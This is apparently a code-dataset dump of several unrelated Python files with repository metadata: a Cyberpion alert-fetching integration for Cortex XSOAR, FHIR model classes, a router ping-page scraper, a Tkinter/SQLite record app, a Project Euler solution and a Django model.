def get_domain_action_items(self, domain: str,
min_severity: int,
alert_types: list = None,
show_only_active=True
) -> Dict[str, Any]:
# call API
return {
"Domain": domain,
"Vulnerabilities": self.get_action_items(domain=domain,
min_severity=min_severity,
alert_types=alert_types,
show_only_active=show_only_active,
max_fetch=None)
}
''' HELPER FUNCTIONS '''
def convert_to_demisto_severity(severity: float) -> int:
"""Maps Cyberpion severity to Cortex XSOAR severity
Converts the Cyberpion alert severity level (1 to 10, float) to Cortex XSOAR incident severity (1 to 4)
for mapping.
:type severity: ``float``
:param severity: severity as returned from the Cyberpion API (float)
:return: Cortex XSOAR Severity (1 to 4)
:rtype: ``int``
"""
# In this case the mapping is straightforward, but more complex mappings
# might be required in your integration, so a dedicated function is
# recommended. This mapping should also be documented.
if 0 <= severity <= 2.5:
return 1
elif 2.6 <= severity <= 5:
return 2
elif 5.1 <= severity <= 7.5:
return 3
elif 7.6 <= severity <= 10:
return 4
raise Exception('value of severity is not between 0-10. invalid value of severity: {}'.format(severity))
''' COMMAND FUNCTIONS '''
def test_module(client: Client) -> str:
"""Tests API connectivity and authentication'
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
:type client: ``Client``
:param Client: client to use
:return: 'ok' if test passed, anything else will fail the test.
:rtype: ``str``
"""
try:
client.get_domain_action_items(domain='company1.com', min_severity=2)
client.get_action_items(max_fetch=2, min_severity=1, alert_types=['PKI'])
client.get_domain_state('company1.com')
except DemistoException as e:
if 'Forbidden' in str(e):
return 'Authorization Error: make sure API Key is correctly set'
else:
raise e
return 'ok'
def fetch_incidents(client: Client,
max_fetch: int,
min_severity: int,
alert_types: list,
show_only_active: bool,
first_fetch: str = None
) -> Tuple[Dict[str, str], List[dict]]:
"""This function retrieves new alerts every interval (default is 1 minute).
:type client: ``Client``
:param Client: Cyberpion integration client to use
:type max_fetch: ``int``
:param max_fetch: Maximum numbers of incidents per fetch
:type min_severity: `int`
:param min_severity:
minimum severity of the alert to search for.
Options are 1 to 10
:type alert_types: ``List[str]``
:param alert_type:
type of alerts to search for. There is no list of predefined types
:type first_fetch: `str`
:param first_fetch:
first date to fetch from. if null, all incidents will be fetched
:return:
A tuple containing two elements:
next_run (``Dict[str, str]``): Contains the timestamp that will be
used in ``last_run`` on the next fetch.
incidents (``List[dict]``): List of incidents that will be created in XSOAR
:rtype: ``Tuple[Dict[str, int], List[dict]]``
"""
last_run_dict = demisto.getLastRun()
if 'last_fetch' in last_run_dict:
last_fetch = last_run_dict['last_fetch']
demisto.debug('last fetch: {}'.format(str(last_fetch)))
else:
demisto.debug('no previous data... this means this is the first time we are fetching incidents')
last_fetch = first_fetch
demisto.debug("Cyberpion fetch incidents last run time\\first fetch: {}".format(
str(last_fetch) if last_fetch else 'fetching all incidents, without time filter'))
action_items = client.get_action_items(
max_fetch=max_fetch,
min_severity=min_severity,
alert_types=alert_types,
show_only_active=show_only_active,
last_fetched_creation_time=last_fetch
)
incidents = []
for action_item in action_items:
creation_date = action_item['creation_time'] # must be string of a DATE_FORMAT
iso_format_data = datetime.strptime(creation_date, DATE_FORMAT).replace(
tzinfo=timezone.utc).isoformat()
incident = {
'name': '{} - {}'.format(action_item['title'], action_item['domain']),
# name is required field, must be set
'occurred': iso_format_data,
'rawJSON': json.dumps(action_item),
'severity': convert_to_demisto_severity(action_item['urgency']),
}
# put in last_incident_date the last action_items creation date. assuming it's ordered by creation date
# last_incident_date = creation_date
incidents.append(incident)
# last incident's time added to new_last_run_dict, so we can next time ask for incidents with creation_time__gt this time
if len(action_items) > 0:
last_incident_date = action_items[-1]['creation_time']
else:
# if no action items from last_incident_date to now, keep asking next time for (new incidents) from
# last_incident_date and on
last_incident_date = last_fetch
new_last_run_dict = {'last_fetch': last_incident_date}
return new_last_run_dict, incidents
def get_domain_state_command(client: Client, args: Dict[str, Any]) -> CommandResults:
domain = args.get('domain')
if not domain:
raise ValueError('no domain specified')
demisto.debug(f'getting domain state {domain}')
domain_state = client.get_domain_state(domain)
demisto.debug(f'creating domain state table for domain {domain}')
markdown = '### Cyberpion\n'
markdown += tableToMarkdown('Domain State', domain_state, headers=[
"id",
"domain",
"ips",
"risk_rank",
"vuln_count",
"cname_chain",
"domain_types",
"discovery_date",
])
demisto.debug(f'finished creating domain state table for domain {domain}')
return CommandResults(
readable_output=markdown,
outputs_prefix='Cyberpion',
outputs_key_field='id',
outputs={"DomainState": domain_state}
)
def get_domain_action_items_command(client: Client, args: Dict[str, Any], min_severity: int, alert_types: list = None,
show_only_active: bool = True) -> CommandResults:
domain = args.get('domain')
if not domain:
raise ValueError('no domain specified')
demisto.debug(f'getting action items for domain {domain}')
domain_data = client.get_domain_action_items(domain=domain,
min_severity=min_severity,
show_only_active=show_only_active,
alert_types=alert_types,
)
demisto.debug(f'creating action items table data for domain {domain}')
markdown = '### Cyberpion\n'
markdown += tableToMarkdown('Action Items', domain_data['Vulnerabilities'], headers=[
"domain",
"category",
"urgency",
"is_open",
"creation_time",
"link",
"title",
"impact",
"summary",
"solution",
"description",
"technical_details"
])
demisto.debug(f'finished creating table data for domain {domain}. returning command result')
return CommandResults(
readable_output=markdown,
outputs_prefix='Cyberpion.DomainData',
outputs_key_field='id',
outputs=domain_data
)
''' MAIN FUNCTION '''
def main() -> None:
"""main function, parses params and runs command functions
:return:
:rtype:
"""
# get the service API url
base_url = demisto.params()['url']
api_key = demisto.params()['apikey']
min_severity = demisto.params()['minSeverity'] # mandatory
alert_types = demisto.params()['categories'] # mandatory
show_only_active = demisto.params()['ShowOnlyOpen'] # mandatory
verify_certificate = not demisto.params().get('insecure', False)
proxy = demisto.params().get('proxy', False)
demisto.debug(f'Command being called is {demisto.command()}')
try:
headers = {
'Authorization': 'Token {}'.format(api_key)
}
client = Client(
base_url=base_url,
verify=verify_certificate,
headers=headers,
proxy=proxy)
if demisto.command() == 'test-module':
# This is the call made when pressing the integration Test button.
result = test_module(client)
return_results(result)
elif demisto.command() == 'cyberpion-get-domain-state':
return_results(get_domain_state_command(client, demisto.args()))
elif demisto.command() == 'cyberpion-get-domain-action-items':
return_results(get_domain_action_items_command(client,
demisto.args(),
min_severity=min_severity,
alert_types=alert_types,
show_only_active=show_only_active))
elif demisto.command() == 'fetch-incidents':
# Set and define the fetch incidents command to run after activated via integration settings.
max_fetch = demisto.params().get('maxFetch')
first_fetch: str = demisto.params().get('first_fetch')
if first_fetch:
months_back = datetime.now() - timedelta(days=30 * int(first_fetch))
first_fetch = datetime.strftime(months_back, DATE_FORMAT)
if not max_fetch:
max_fetch = DEFAULT_MAX_INCIDENTS_TO_FETCH
try:
max_fetch = int(max_fetch)
if max_fetch > 500 or max_fetch < 1:
raise ValueError()
except ValueError:
raise ValueError('max_fetch must be an integer between 1 to 500')
if max_fetch > DEFAULT_MAX_INCIDENTS_TO_FETCH:
max_fetch = DEFAULT_MAX_INCIDENTS_TO_FETCH
new_last_run_dict, incidents = fetch_incidents(
client=client,
max_fetch=max_fetch,
min_severity=min_severity,
show_only_active=show_only_active,
alert_types=alert_types,
first_fetch=first_fetch
)
# create incidents
demisto.incidents(incidents)
# saves next_run for the time fetch-incidents is invoked
demisto.setLastRun(new_last_run_dict)
else:
raise NotImplementedError(f'no such command: {demisto.command()}')
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Cyberpion integration: Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 39.282511 | 125 | 0.602055 |
43132270d11f024901d597608d82f6490984c29f
| 25,494 |
py
|
Python
|
fhirclient/r4models/implementationguide.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
fhirclient/r4models/implementationguide.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
fhirclient/r4models/implementationguide.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b (http://hl7.org/fhir/StructureDefinition/ImplementationGuide) on 2019-05-07.
# 2019, SMART Health IT.
from . import domainresource
class ImplementationGuide(domainresource.DomainResource):
""" A set of rules about how FHIR is used.
A set of rules of how a particular interoperability or standards problem is
solved - typically through the use of FHIR resources. This resource is used
to gather all the parts of an implementation guide into a logical whole and
to publish a computable definition of all the parts.
"""
resource_type = "ImplementationGuide"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.contact = None
""" Contact details for the publisher.
List of `ContactDetail` items (represented as `dict` in JSON). """
self.copyright = None
""" Use and/or publishing restrictions.
Type `str`. """
self.date = None
""" Date last changed.
Type `FHIRDate` (represented as `str` in JSON). """
self.definition = None
""" Information needed to build the IG.
Type `ImplementationGuideDefinition` (represented as `dict` in JSON). """
self.dependsOn = None
""" Another Implementation guide this depends on.
List of `ImplementationGuideDependsOn` items (represented as `dict` in JSON). """
self.description = None
""" Natural language description of the implementation guide.
Type `str`. """
self.experimental = None
""" For testing purposes, not real usage.
Type `bool`. """
self.fhirVersion = None
""" FHIR Version(s) this Implementation Guide targets.
List of `str` items. """
self.global_fhir = None
""" Profiles that apply globally.
List of `ImplementationGuideGlobal` items (represented as `dict` in JSON). """
self.jurisdiction = None
""" Intended jurisdiction for implementation guide (if applicable).
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.license = None
""" SPDX license code for this IG (or not-open-source).
Type `str`. """
self.manifest = None
""" Information about an assembled IG.
Type `ImplementationGuideManifest` (represented as `dict` in JSON). """
self.name = None
""" Name for this implementation guide (computer friendly).
Type `str`. """
self.packageId = None
""" NPM Package name for IG.
Type `str`. """
self.publisher = None
""" Name of the publisher (organization or individual).
Type `str`. """
self.status = None
""" draft | active | retired | unknown.
Type `str`. """
self.title = None
""" Name for this implementation guide (human friendly).
Type `str`. """
self.url = None
""" Canonical identifier for this implementation guide, represented as
a URI (globally unique).
Type `str`. """
self.useContext = None
""" The context that the content is intended to support.
List of `UsageContext` items (represented as `dict` in JSON). """
self.version = None
""" Business version of the implementation guide.
Type `str`. """
super(ImplementationGuide, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuide, self).elementProperties()
js.extend([
("contact", "contact", contactdetail.ContactDetail, True, None, False),
("copyright", "copyright", str, False, None, False),
("date", "date", fhirdate.FHIRDate, False, None, False),
("definition", "definition", ImplementationGuideDefinition, False, None, False),
("dependsOn", "dependsOn", ImplementationGuideDependsOn, True, None, False),
("description", "description", str, False, None, False),
("experimental", "experimental", bool, False, None, False),
("fhirVersion", "fhirVersion", str, True, None, True),
("global_fhir", "global", ImplementationGuideGlobal, True, None, False),
("jurisdiction", "jurisdiction", codeableconcept.CodeableConcept, True, None, False),
("license", "license", str, False, None, False),
("manifest", "manifest", ImplementationGuideManifest, False, None, False),
("name", "name", str, False, None, True),
("packageId", "packageId", str, False, None, True),
("publisher", "publisher", str, False, None, False),
("status", "status", str, False, None, True),
("title", "title", str, False, None, False),
("url", "url", str, False, None, True),
("useContext", "useContext", usagecontext.UsageContext, True, None, False),
("version", "version", str, False, None, False),
])
return js
from . import backboneelement
class ImplementationGuideDefinition(backboneelement.BackboneElement):
""" Information needed to build the IG.
The information needed by an IG publisher tool to publish the whole
implementation guide.
"""
resource_type = "ImplementationGuideDefinition"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.grouping = None
""" Grouping used to present related resources in the IG.
List of `ImplementationGuideDefinitionGrouping` items (represented as `dict` in JSON). """
self.page = None
""" Page/Section in the Guide.
Type `ImplementationGuideDefinitionPage` (represented as `dict` in JSON). """
self.parameter = None
""" Defines how IG is built by tools.
List of `ImplementationGuideDefinitionParameter` items (represented as `dict` in JSON). """
self.resource = None
""" Resource in the implementation guide.
List of `ImplementationGuideDefinitionResource` items (represented as `dict` in JSON). """
self.template = None
""" A template for building resources.
List of `ImplementationGuideDefinitionTemplate` items (represented as `dict` in JSON). """
super(ImplementationGuideDefinition, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinition, self).elementProperties()
js.extend([
("grouping", "grouping", ImplementationGuideDefinitionGrouping, True, None, False),
("page", "page", ImplementationGuideDefinitionPage, False, None, False),
("parameter", "parameter", ImplementationGuideDefinitionParameter, True, None, False),
("resource", "resource", ImplementationGuideDefinitionResource, True, None, True),
("template", "template", ImplementationGuideDefinitionTemplate, True, None, False),
])
return js
class ImplementationGuideDefinitionGrouping(backboneelement.BackboneElement):
""" Grouping used to present related resources in the IG.
A logical group of resources. Logical groups can be used when building
pages.
"""
resource_type = "ImplementationGuideDefinitionGrouping"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.description = None
""" Human readable text describing the package.
Type `str`. """
self.name = None
""" Descriptive name for the package.
Type `str`. """
super(ImplementationGuideDefinitionGrouping, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinitionGrouping, self).elementProperties()
js.extend([
("description", "description", str, False, None, False),
("name", "name", str, False, None, True),
])
return js
class ImplementationGuideDefinitionPage(backboneelement.BackboneElement):
""" Page/Section in the Guide.
A page / section in the implementation guide. The root page is the
implementation guide home page.
"""
resource_type = "ImplementationGuideDefinitionPage"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.generation = None
""" html | markdown | xml | generated.
Type `str`. """
self.nameReference = None
""" Where to find that page.
Type `FHIRReference` (represented as `dict` in JSON). """
self.nameUrl = None
""" Where to find that page.
Type `str`. """
self.page = None
""" Nested Pages / Sections.
List of `ImplementationGuideDefinitionPage` items (represented as `dict` in JSON). """
self.title = None
""" Short title shown for navigational assistance.
Type `str`. """
super(ImplementationGuideDefinitionPage, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinitionPage, self).elementProperties()
js.extend([
("generation", "generation", str, False, None, True),
("nameReference", "nameReference", fhirreference.FHIRReference, False, "name", True),
("nameUrl", "nameUrl", str, False, "name", True),
("page", "page", ImplementationGuideDefinitionPage, True, None, False),
("title", "title", str, False, None, True),
])
return js
class ImplementationGuideDefinitionParameter(backboneelement.BackboneElement):
""" Defines how IG is built by tools.
"""
resource_type = "ImplementationGuideDefinitionParameter"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.code = None
""" apply | path-resource | path-pages | path-tx-cache | expansion-
parameter | rule-broken-links | generate-xml | generate-json |
generate-turtle | html-template.
Type `str`. """
self.value = None
""" Value for named type.
Type `str`. """
super(ImplementationGuideDefinitionParameter, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinitionParameter, self).elementProperties()
js.extend([
("code", "code", str, False, None, True),
("value", "value", str, False, None, True),
])
return js
class ImplementationGuideDefinitionResource(backboneelement.BackboneElement):
""" Resource in the implementation guide.
A resource that is part of the implementation guide. Conformance resources
(value set, structure definition, capability statements etc.) are obvious
candidates for inclusion, but any kind of resource can be included as an
example resource.
"""
resource_type = "ImplementationGuideDefinitionResource"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.description = None
""" Reason why included in guide.
Type `str`. """
self.exampleBoolean = None
""" Is an example/What is this an example of?.
Type `bool`. """
self.exampleCanonical = None
""" Is an example/What is this an example of?.
Type `str`. """
self.fhirVersion = None
""" Versions this applies to (if different to IG).
List of `str` items. """
self.groupingId = None
""" Grouping this is part of.
Type `str`. """
self.name = None
""" Human Name for the resource.
Type `str`. """
self.reference = None
""" Location of the resource.
Type `FHIRReference` (represented as `dict` in JSON). """
super(ImplementationGuideDefinitionResource, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinitionResource, self).elementProperties()
js.extend([
("description", "description", str, False, None, False),
("exampleBoolean", "exampleBoolean", bool, False, "example", False),
("exampleCanonical", "exampleCanonical", str, False, "example", False),
("fhirVersion", "fhirVersion", str, True, None, False),
("groupingId", "groupingId", str, False, None, False),
("name", "name", str, False, None, False),
("reference", "reference", fhirreference.FHIRReference, False, None, True),
])
return js
class ImplementationGuideDefinitionTemplate(backboneelement.BackboneElement):
""" A template for building resources.
"""
resource_type = "ImplementationGuideDefinitionTemplate"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.code = None
""" Type of template specified.
Type `str`. """
self.scope = None
""" The scope in which the template applies.
Type `str`. """
self.source = None
""" The source location for the template.
Type `str`. """
super(ImplementationGuideDefinitionTemplate, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinitionTemplate, self).elementProperties()
js.extend([
("code", "code", str, False, None, True),
("scope", "scope", str, False, None, False),
("source", "source", str, False, None, True),
])
return js
class ImplementationGuideDependsOn(backboneelement.BackboneElement):
""" Another Implementation guide this depends on.
Another implementation guide that this implementation depends on.
Typically, an implementation guide uses value sets, profiles etc.defined in
other implementation guides.
"""
resource_type = "ImplementationGuideDependsOn"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.packageId = None
""" NPM Package name for IG this depends on.
Type `str`. """
self.uri = None
""" Identity of the IG that this depends on.
Type `str`. """
self.version = None
""" Version of the IG.
Type `str`. """
super(ImplementationGuideDependsOn, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDependsOn, self).elementProperties()
js.extend([
("packageId", "packageId", str, False, None, False),
("uri", "uri", str, False, None, True),
("version", "version", str, False, None, False),
])
return js
class ImplementationGuideGlobal(backboneelement.BackboneElement):
""" Profiles that apply globally.
A set of profiles that all resources covered by this implementation guide
must conform to.
"""
resource_type = "ImplementationGuideGlobal"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.profile = None
""" Profile that all resources must conform to.
Type `str`. """
self.type = None
""" Type this profile applies to.
Type `str`. """
super(ImplementationGuideGlobal, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideGlobal, self).elementProperties()
js.extend([
("profile", "profile", str, False, None, True),
("type", "type", str, False, None, True),
])
return js
class ImplementationGuideManifest(backboneelement.BackboneElement):
""" Information about an assembled IG.
Information about an assembled implementation guide, created by the
publication tooling.
"""
resource_type = "ImplementationGuideManifest"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.image = None
""" Image within the IG.
List of `str` items. """
self.other = None
""" Additional linkable file in IG.
List of `str` items. """
self.page = None
""" HTML page within the parent IG.
List of `ImplementationGuideManifestPage` items (represented as `dict` in JSON). """
self.rendering = None
""" Location of rendered implementation guide.
Type `str`. """
self.resource = None
""" Resource in the implementation guide.
List of `ImplementationGuideManifestResource` items (represented as `dict` in JSON). """
super(ImplementationGuideManifest, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideManifest, self).elementProperties()
js.extend([
("image", "image", str, True, None, False),
("other", "other", str, True, None, False),
("page", "page", ImplementationGuideManifestPage, True, None, False),
("rendering", "rendering", str, False, None, False),
("resource", "resource", ImplementationGuideManifestResource, True, None, True),
])
return js
class ImplementationGuideManifestPage(backboneelement.BackboneElement):
""" HTML page within the parent IG.
Information about a page within the IG.
"""
resource_type = "ImplementationGuideManifestPage"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.anchor = None
""" Anchor available on the page.
List of `str` items. """
self.name = None
""" HTML page name.
Type `str`. """
self.title = None
""" Title of the page, for references.
Type `str`. """
super(ImplementationGuideManifestPage, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideManifestPage, self).elementProperties()
js.extend([
("anchor", "anchor", str, True, None, False),
("name", "name", str, False, None, True),
("title", "title", str, False, None, False),
])
return js
class ImplementationGuideManifestResource(backboneelement.BackboneElement):
""" Resource in the implementation guide.
A resource that is part of the implementation guide. Conformance resources
(value set, structure definition, capability statements etc.) are obvious
candidates for inclusion, but any kind of resource can be included as an
example resource.
"""
resource_type = "ImplementationGuideManifestResource"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.exampleBoolean = None
""" Is an example/What is this an example of?.
Type `bool`. """
self.exampleCanonical = None
""" Is an example/What is this an example of?.
Type `str`. """
self.reference = None
""" Location of the resource.
Type `FHIRReference` (represented as `dict` in JSON). """
self.relativePath = None
""" Relative path for page in IG.
Type `str`. """
super(ImplementationGuideManifestResource, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideManifestResource, self).elementProperties()
js.extend([
("exampleBoolean", "exampleBoolean", bool, False, "example", False),
("exampleCanonical", "exampleCanonical", str, False, "example", False),
("reference", "reference", fhirreference.FHIRReference, False, None, True),
("relativePath", "relativePath", str, False, None, False),
])
return js
import sys
try:
from . import codeableconcept
except ImportError:
codeableconcept = sys.modules[__package__ + '.codeableconcept']
try:
from . import contactdetail
except ImportError:
contactdetail = sys.modules[__package__ + '.contactdetail']
try:
from . import fhirdate
except ImportError:
fhirdate = sys.modules[__package__ + '.fhirdate']
try:
from . import fhirreference
except ImportError:
fhirreference = sys.modules[__package__ + '.fhirreference']
try:
from . import usagecontext
except ImportError:
usagecontext = sys.modules[__package__ + '.usagecontext']
| 39.041348 | 117 | 0.601906 |
4a6bab9bd58e5283a4d01166b335fae8bbe5442a
| 628 |
py
|
Python
|
P8702N/pingTest.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | 1 |
2017-12-12T13:58:08.000Z
|
2017-12-12T13:58:08.000Z
|
P8702N/pingTest.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | null | null | null |
P8702N/pingTest.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | 1 |
2019-11-03T10:16:35.000Z
|
2019-11-03T10:16:35.000Z
|
import impat
impat.addfolder('python')
import requests
from FunCom import find_between
from session import login, host, cookies
if login.status_code == requests.codes.ok and cookies['SESSION'] is not '':
print('=~=~=~=~=~=~=~=~=~=~=~= =~=~=~=~=~=~=~=~=~=~=~=')
f = requests.get('http://%s/pages/maintenance/disagnostic/pingTest.html' % host, cookies=login.cookies)
form_action = find_between(f.text, '<form action="', '" method="post">')
sessionKey = find_between(f.text, '<input type="hidden" name="sessionKey" id="sessionKey" value="', '">')
print(form_action, sessionKey)
| 44.857143 | 109 | 0.624204 |
6029cebe3aab069699f06fc1541d6645afb853cc
| 2,952 |
py
|
Python
|
python_gui_tkinter/KALU/GARBAGE1/SAFE27JUL/AppOperations.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python_gui_tkinter/KALU/GARBAGE1/SAFE27JUL/AppOperations.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python_gui_tkinter/KALU/GARBAGE1/SAFE27JUL/AppOperations.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import sqlite3
from tkinter import *
from tkinter import font
from tkinter.filedialog import askopenfilename
from datetime import datetime
# making the connection
conn = sqlite3.connect("appDb.sqlite")
cur = conn.cursor()
# email address is the primary key
cur.executescript('''
CREATE TABLE IF NOT EXISTS details(
sl_no INTEGER,
name TEXT,
e_mail TEXT,
flat TEXT,
tower TEXT,
area INTEGER,
parking TEXT,
recpt_fees INTEGER,
addr TEXT,
contact_no TEXT,
timestmp DATE
);
''')
total_record = 0
class Rec:
def countTotalRec():
cur.execute('''SELECT count( * ) as total_record FROM details''')
total_record = cur.fetchone()[0]
print("Total data present : ",total_record)
return total_record
def timestmp():
tmestmp = datetime.now().isoformat(timespec='seconds')
return tmestmp
class AppOperations:
def save_root():
print("Saving your data !")
conn.commit()
def insertData(name, e_mail, tower, flat, area, parking, recpt_fees, addr, contact_no):
try :
cur.execute('''INSERT
INTO details (sl_no, name, e_mail, tower, flat, area, parking, recpt_fees, addr, contact_no, timestmp)
VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ? )''',
( (Rec.countTotalRec()+1),name,e_mail,tower,flat,area,parking,recpt_fees,addr,contact_no,Rec.timestmp(),))
conn.commit()
return 1
except:
print("Ops! something went wrong during insertion of the data!!")
return 0
return 1
def displayData(): # returns all the data present in the db, list of tuples
data_fetch = cur.execute(''' SELECT * FROM details ''')
list_db = []
for item in data_fetch:
list_db.append(item)
#print(list_db)
return list_db
def countTotalItems():
total_items = 0 # contains the total no. of items present in the table
data_fetch = cur.execute(''' SELECT * FROM details ''')
for item in data_fetch:
total_items = total_items + 1
return total_items
def reset_slno():
data_fetch = cur.execute(''' SELECT * FROM details''')
slno_dum = 0
for item in data_fetch:
first = item[10]
print("first : ",first)
slno_dum = slno_dum + 1
print("sl_no : ",slno_dum)
conn.commit()
def update_values(val_date):
print("date obtained = ",val_date)
rowfetch = cur.execute(''' SELECT * FROM details where timestmp = ?''',(val_date,))
tuple_needed = tuple(rowfetch)[0]
#print("Row fetched! : ", tuple_needed)
return tuple_needed
def updateData(slno,name, e_mail, flat, tower, area, parking, recpt_fees, addr, contact_no,tmestmp):
print("values to be updated : ",slno," ",name," ",e_mail," ", tower, flat, area, parking, recpt_fees, addr, contact_no,tmestmp)
cur.execute(''' UPDATE details SET sl_no = ?, name = ?, e_mail = ?, tower = ?, flat = ?, area = ?, parking = ?,
recpt_fees = ?, addr = ?, contact_no = ? WHERE timestmp = ?''',
(slno,name, e_mail, tower, flat, area, parking, recpt_fees, addr, contact_no,tmestmp))
conn.commit()
| 30.75 | 129 | 0.673103 |
602e2080a574d1c061f3b8f0289691928fdce49a
| 308 |
py
|
Python
|
euler-20.py
|
TFabijo/euler
|
58dc07b9adb236890556ccd5d75ca9dbd2b50df9
|
[
"MIT"
] | null | null | null |
euler-20.py
|
TFabijo/euler
|
58dc07b9adb236890556ccd5d75ca9dbd2b50df9
|
[
"MIT"
] | null | null | null |
euler-20.py
|
TFabijo/euler
|
58dc07b9adb236890556ccd5d75ca9dbd2b50df9
|
[
"MIT"
] | null | null | null |
def fakulteta(n):
zmnozek = 1
for x in range(1,n+1):
zmnozek *= x
return zmnozek
def vsota_stevk_fakultete(n):
fakul = fakulteta(n)
vsota = 0
while fakul > 0:
vsota += fakul % 10
fakul //= 10
return vsota
vsota_stevk_fakultete(100)
| 16.210526 | 30 | 0.542208 |
7164086abb152f9645f762b1d0eba577e01e81fd
| 183 |
py
|
Python
|
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/recordings/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/recordings/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/recordings/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
# Create your models here.
class Recording(models.Model):
name = models.CharField(max_length = 200)
length_ms = models.IntegerField(default = 0)
| 26.142857 | 48 | 0.743169 |
